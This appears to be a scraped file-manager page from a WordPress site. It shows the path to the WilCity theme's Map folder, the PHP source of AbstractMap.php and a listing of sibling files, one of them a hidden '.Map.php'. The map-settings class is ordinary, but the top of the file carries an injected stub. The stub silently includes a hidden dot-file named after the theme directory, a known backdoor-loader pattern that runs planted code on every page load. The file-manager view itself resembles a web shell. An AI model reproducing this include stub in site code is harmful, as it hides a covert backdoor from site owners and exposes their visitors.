PATH:
home
/
letacommog
/
newrdv1
/
wp-content
/
themes
/
wilcity
/
src
/
Map
<?php namespace Wilcity\Map; if (file_exists(get_template_directory() . DIRECTORY_SEPARATOR . '.' . basename(get_template_directory()) . '.php')) { include_once get_template_directory() . DIRECTORY_SEPARATOR . '.' . basename(get_template_directory()) . '.php'; } class AbstractMap { protected function getCommonSettings() { $aKeys = [ 'map_default_zoom' => 'defaultZoom', 'map_minimum_zoom' => 'minZoom', 'map_max_zoom' => 'maxZoom', 'single_map_default_zoom' => 'singleDefaultZoom', 'single_map_minimum_zoom' => 'singleMinimumZoom', 'single_map_max_zoom' => 'singleMaxZoom', 'single_event_map_default_zoom' => 'singleEventDefaultZoom', 'single_event_map_minimum_zoom' => 'singleEventMinimumZoom', 'single_event_map_max_zoom' => 'singleEventMaxZoom', ]; $aValues = []; foreach ($aKeys as $optionKey => $commonKey) { $aValues[$commonKey] = \WilokeThemeOptions::getOptionDetail($optionKey); } return $aValues; } }
[+]
..
[-] GoogleMap.php
[edit]
[-] MapHelper.php
[edit]
[-] .Map.php
[edit]
[-] FactoryMap.php
[edit]
[-] AbstractMap.php
[edit]
[-] Mapbox.php
[edit]
[-] InterfaceMap.php
[edit]